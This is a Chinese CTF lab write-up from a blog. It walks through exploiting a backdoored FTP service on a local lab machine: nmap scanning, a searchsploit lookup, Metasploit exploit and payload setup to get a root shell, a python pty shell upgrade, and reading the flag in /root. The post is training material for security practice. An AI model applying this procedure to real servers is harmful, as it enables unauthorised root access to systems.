CTF--8.FTP服务后门利用

最新推荐文章于 2024-05-16 10:34:49 发布
最新推荐文章于 2024-05-16 10:34:49 发布
阅读量878 收藏 2
点赞数 1
分类专栏: ctf 文章标签: 服务器 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woo233/article/details/126836368
版权

FTP介绍

FTP是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。
在FTP的使用当中,用户经常遇到两个概念:"下载”(Download)和上传(Upload)。
"下载"文件就是从远程主机拷贝文件至自己的计算机上,
"上传"文件就是将文件从自己的计算机中拷贝至远程主机上。
用Internet语言来说,用户可通过客户机程序向(从)远程主机上传(下载)文件。

实验环境

攻击机:192.168.1.105
靶场机器:192.168.1.100

目的:获取靶场机器上的flag值;

信息探测

扫描主机服务信息以及服务版本
–nmap -sV 靶场IP地址

快速扫描主机全部信息
– nmap -T4 -A -v 靶场IP地址

在这里插入图片描述
发现开放了21端口,ftp服务
使用seachsploit 版本号,查看漏洞信息,找到可利用的溢出代码;
在这里插入图片描述
看到有2个文件,首先查看第一个文件txt
在这里插入图片描述
在这里插入图片描述
可以在这个文件中去修改源代码,但是比较麻烦
在这里插入图片描述
可以看到第二个为metasploit,

使用metasploit进行溢出

打开Metasploit在终端中输入msfconsole
在这里插入图片描述

输入search对应的软件及版本号
在这里插入图片描述
发现了exploit并使用exploit
– use exploit

在这里插入图片描述

查看可以使用的payload
– show payload
在这里插入图片描述

设置payload
– set payload
在这里插入图片描述

查看需要设置的参数
– show options

在这里插入图片描述
需要设置靶场和攻击机的IP

– set rhost 靶场IP
– set lhost 攻击机IP
在这里插入图片描述
查看设置成功与否
在这里插入图片描述

进行远程溢出,来获取权限
– exploit
在这里插入图片描述

执行命令id,来查看现在所获取的权限是否为root
在这里插入图片描述

优化shell

使用python pty开启终端

-- python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

获取Flag
一般情况下,靶场机器的flag值是存放在服务器的根目录下,/root/目录。
cd /root/
ls -alh在这里插入图片描述

cat flag
在这里插入图片描述

writeup测试文档总结文档

总结

对于开放FTP、sSH、Telnet等服务的系统,公可以尝试一些对应服务版本的漏洞代码;
对于系统,一定要注意利用现成的EXP来root主机;

wow2ok
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ftp服务后面漏洞——CTF靶机
panda.
10-24 326
使用metasploit平台扫描查看有无漏洞。使用nmap工具扫描靶机查看端口开放状态。渗透到靶机,并且权限是root权限。首先使用fping扫描靶机ip。发现有漏洞,使用漏洞并配置参数。扫描21端口服务版本信息。
Google-CTF-2016-Stego.pcap数据包
10-08
Google-CTF-2016-Stego.pcap数据包
CTF靶场之FTP服务后门利用
D1stiny的博客
05-26 669
FTP(File Transfer Protocol,文件传输协议)是TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。 默认情况下FTP协议使用TCP端口中的 20和21这两个端口,其中20用于传输数据,21用于传输控
FTP服务后门利用
qq_39687353的博客
04-11 935
FTP服务后门利用 1.什么是 FTP? 是文件传输协议的简称。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。用户可以通过它把自己的PC机与世界各地所有运行FTP协议的服务器相连,访问服务器上的大量程序和信息。 FTP 是因特网网络上历史最悠久的网络工具,从 1971 年由 A KBHUSHAN 提出第一个 FTP 的RFC(RFC114) 至今近半个世纪来,FTP 凭借其独特的优势一直都是因特网中最重要、最广泛的服务之一。 2.searchsploit
应急响应-CTF-BUUCTF-后门查杀 1
theenderofroot的博客
04-12 1204
明显的一个文件包含漏洞代码,可以GET传参自定义文件名并且自动拼接php后缀,但是没有flag。2、下载下来是一个网站源码,看来是一道代码审计题,直接把文件夹放入PhpStorm中。5、那么就只能先看include文件夹了,里面还有个include.php,重点审查。4、 uploud文件夹里有个压缩包,打开看发现是一个很正常的word文档。发现$pass变量,内容好像是MD5加密字符串,包上flag试一试。3、先看web.php,这个文件的名字有点可疑。1、快速过一下题目,下载压缩包。
CTF训练笔记(四)- FTP服务后门利用
morrino的博客
04-19 2035
对于开放了FTP、SSH、Telnet等服务的系统,可以尝试一些对应服务版本的漏洞代码; 对于系统一定要注意利用现成的EXP来拿到靶机root权限。 如果靶机开启了多个服务,貌似有很多不同方法可以拿到root权限,那就用最简单的方法。 本次渗透测试利用了已经存在的EXP直接一步到位地拿到了靶机的root权限,极大地提升了获取flag的速度。 [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
内网安全 隐藏通信隧道技术——上传与下载.(可以将 后门进行上传,维持控制对服务器的权限.)
网络安全领域___专研者.
05-05 1081
隧道技术的概括: 隧道就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上。
什么是UTF-8?
热门推荐
qq_57534559的博客
09-07 1万+
UTF-8 就是在互联网上使用最广的一种 Unicode 的实现方式。 UTF-8 最大的一个特点,就是它是一种变长的编码方式。**它可以使用1~4个字节表示一个符号,根据不同的符号而变化字节长度**。
ctf-wscan-master.zip
12-08
ctf-wscan-master.zip Linux下安装运行
ctf-tools-master.zip
09-03
ctf常用工具,适合初学者使用,在docker环境中使用,包含crpto,misc,pwn等全部内容。ctf常用工具,适合初学者使用,在docker环境中使用,包含crpto,misc,pwn等全部内容。
ctf-tools-linux-master.zip
06-22
ctf集成工具包-linux版
CTF-RSA-tool-master.zip
01-19
针对CTF中CRYPTO的RSA工具
CTF-FTP后门利用
不知名白帽的博客
08-19 1561
CTF-FTP后门利用
两道CTF题--FTP被动模式打php-fpm
unexpectedthing的博客
02-25 1589
文章目录[陇原战疫2021网络安全大赛]eaaasyphp考点思路总结解题先看phpinfo():我们先尝试写入shellFTP的被动模式打FastCGI蓝帽杯2021 One Pointer PHP考点php数组溢出命令执行拿webshell方法1:绕过open_basedir利用未授权打FPM RCE加载恶意so文件开启FTP服务器上传文件处理伪造恶意FastCGI请求流程SUID提权总结方法2:步骤:原理: [陇原战疫2021网络安全大赛]eaaasyphp 考点 反序列化–pop链的构成 F
FTP
weixin_34176694的博客
09-19 652
1, FTP(文件传输协议) FTP 是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:"下载"(Download)和"...
CTF-08
渗透笔记
01-19 397
题目说明:pyscript 1.打开链接后,界面如图所示,提示要输入密码并提交 2.重新访问首页,并对其抓包–>send to repeater–>go 在响应头中得到Ciphertext 在响应内容中得到一些题目提示 3.根据题目说明,这道题就是写python脚本 import hashlib import requests import re def sha1(d
ftp服务后门利用
Vinson的博客
09-24 657
FTP、File transfer protocol文件传输协议,同时它也是一个应用程序。下载和上传就是用这个协议。 searchsploit +版本 查看漏洞信息,找到可利用的溢出代码 需要修改这个文件造成溢出 使用Metasploit进行溢出(用msfconsole打开) 1、输入search对应软件和版本号 2、use exploit 3、查看可以使...
Linux系统的PHP-Webshell后门实验
A0000FF的博客
04-02 809
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。
服务器数据恢复—服务器重装系统导致分区丢失的数据恢复案例
最新发布
beiya123的博客
05-16 255
以只读方式将所有磁盘进行扇区级的全盘镜像,镜像完成后将所有磁盘按照编号还原到原磁盘柜中,后续的数据分析和数据恢复操作都基于镜像文件进行,避免对原始磁盘数据造成二次破坏。2、基于镜像文件分析raid的盘序、条带大小、循环方向、同步异步等重组raid的必需信息,利用获取到raid信息重组raid。5、根据超级块备份及xfs文件系统中的目录树结构,北亚企安数据恢复工程师对xfs文件系统的超级块进行修复。4、校验xfs文件系统的完整性及正确性,结果发现xfs文件系统头部超级块丢失、部分节点丢失、目录项丢失。
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wow2ok

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值